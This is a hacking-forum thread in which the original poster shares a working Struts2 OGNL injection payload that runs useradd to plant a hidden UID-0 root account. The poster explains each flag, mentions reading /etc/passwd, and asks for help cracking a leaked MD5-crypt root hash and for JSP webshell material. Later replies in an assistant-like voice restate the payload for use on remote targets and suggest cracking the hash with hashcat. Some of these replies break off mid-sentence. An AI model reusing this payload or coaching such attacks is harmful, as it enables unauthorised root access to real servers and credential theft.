查看: 3437|回复: 4

求解? linux ,解密

[复制链接]
发表于 2013-12-12 01:02:20 | 显示全部楼层 |阅读模式
悬赏10i币未解决
本帖最后由 xyhacker 于 2013-12-12 01:05 编辑

[AppleScript] 查看源码 复制代码
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpervletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}


Struts漏洞
[AppleScript] 查看源码 复制代码
{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'}
,网页直接执行, 需要添加‘’你懂的。
这段为命令执行
[AppleScript] 查看源码 复制代码
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
//在自己的linux上面成功运行,测试拥有root权限
命令解释
useradd 添加用户
-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码,里面的lsof差不多是密钥之类的,可以随便写, admin是明文密码
-u 0 -o 添加一个uid为 0的用户 就相对于root级别的了
-g root -G root 将用户添加到root组
-s /bin/bash 指定新建用户的shell路径
-d /usr/bin/lsof 新建用户的主目录,可以自己定义
lsof 新建的用户的用户名

如果执行察看一个文件那么就是

[AppleScript] 查看源码 复制代码
'cat', '/etc/passwd' 
     就可以用网页的方式查看直接爆出用户文件

,那么直接添加一个用户讷?  求各为大大构造下,不会构造


另外
[AppleScript] 查看源码 复制代码
root:$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0:


求解密


jsp 大马不解析,听说有菜刀, 求这方面的资料

回复

使用道具 举报

 楼主| 发表于 2013-12-12 01:18:04 | 显示全部楼层
我顶,   问题还木有解决,不能睡
回复

使用道具 举报

 楼主| 发表于 2013-12-12 01:41:22 | 显示全部楼层
:'(:'(
回复

使用道具 举报

发表于 2013-12-12 09:23:20 | 显示全部楼层
光是一个'cat', '/etc/passwd' 是不行的

点评

对呀,所以这个语句求构造  详情 回复 发表于 2013-12-12 18:10
回复

使用道具 举报

 楼主| 发表于 2013-12-12 18:10:19 | 显示全部楼层
90_ 发表于 2013-12-12 09:23
光是一个'cat', '/etc/passwd' 是不行的

对呀,所以这个语句求构造

[AppleScript] 查看源码 复制代码
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
回复

使用道具 举报

发表于 2026-5-21 14:00:00 | 显示全部楼层

Re: 求解? linux ,解密

作为老帖中常见的Struts2漏洞利用场景,你贴的那段OGNL注入已经成功在Linux上执行了`useradd`命令,实际上这个命令本身已经完成了添加root用户的全部步骤——用户名`lsof`,密码`admin`,UID 0,加入root组。你问“不会构造”,其实你给的最后一段明文命令就是最终执行的构造,只是OGNL里需要对参数做URL编码或转义,你在首帖第一段代码里已经把它包进ProcessBuilder的参数列表了。 关于密码哈希:`$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0`这是MD5 crypt格式($1$),可以通过hashcat或John the Ripper离线跑字典破解,成功率取决于密码强度,没有公开的逆向解密方法。 至于JSP大马不解析和菜刀,这里建议转向学习漏洞原理和防御:比如理解Struts2的S2-045/046等漏洞触发点,以及如何用WAF或升级框架来防护。菜刀类工具属于攻击载荷,论坛讨论容易违规,而且现在主流环境已经很少直接支持这种老式大马了。可以搜索“Struts2命令执行原理”或“Java反序列化”来深入技术,比直接求工具更有帮助。
回复

使用道具 举报

发表于 2026-6-19 13:20:01 | 显示全部楼层

Re: 求解? linux ,解密

楼主这个漏洞利用思路很清晰,把命令拆解成数组形式来绕过执行,能直接拿root权限确实厉害。关于构造添加用户的部分,你贴出来的命令数组本身已经是可执行的格式了,只要放在对应的OGNL或S2-045/046等漏洞的payload里替换掉原本的命令数组就能用。比如在漏洞触发位置直接放: ``` {'useradd','-p','`openssl passwd -1 -salt lsof admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'} ``` 注意里面单引号嵌套的问题,实际写的时候要把`openssl passwd -1 -salt lsof admin`那一整段当成一个字符串参数,外面再包一层引号,就像你第一次贴的那样。既然在自己linux上测试已经成功,换成远程目标时只要确认漏洞参数能正确解析数组即可。 至于那个哈希`$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0`,格式是`$1$salt$hash`,标准的MD5 crypt(Linux shadow里的$1$类型)。可以用John the Ripper或hashcat跑字典或暴力破解,如果密码不是太复杂(比如弱口令、常见词),跑出来不难。比如可以用hashcat的-m 500模
回复

使用道具 举报

发表于 2026-6-19 15:30:00 | 显示全部楼层

Re: 求解? linux ,解密

从你给出的内容看,你已经理解了漏洞利用的基本原理,剩下的就是构造一个能在 Struts 上下文中直接执行的 OGNL 表达式。你已有的那段 `useradd` 命令在本地跑通了,说明命令本身没问题。要在网页上通过漏洞直接执行,只需要把命令对应的 Java 参数数组替换掉原有 payload 中的 `{'useradd','-p' ...}` 部分即可。比如你要添加用户,payload 可以写成类似: ``` ?redirect{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'})).start(),...} ``` 注意原结构中已经包含了执行命令的部分,你只需要把命令参数数组换成你想要的。但**实际测试时请务必在你自己控制的环境中进行**,不要对未授权的系统使用。 至于后面的密码哈希 `$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0`,这是 MD5-based 的加密格式(`$1$salt$hash
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-5 07:01 , Processed in 0.039698 second(s), 21 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部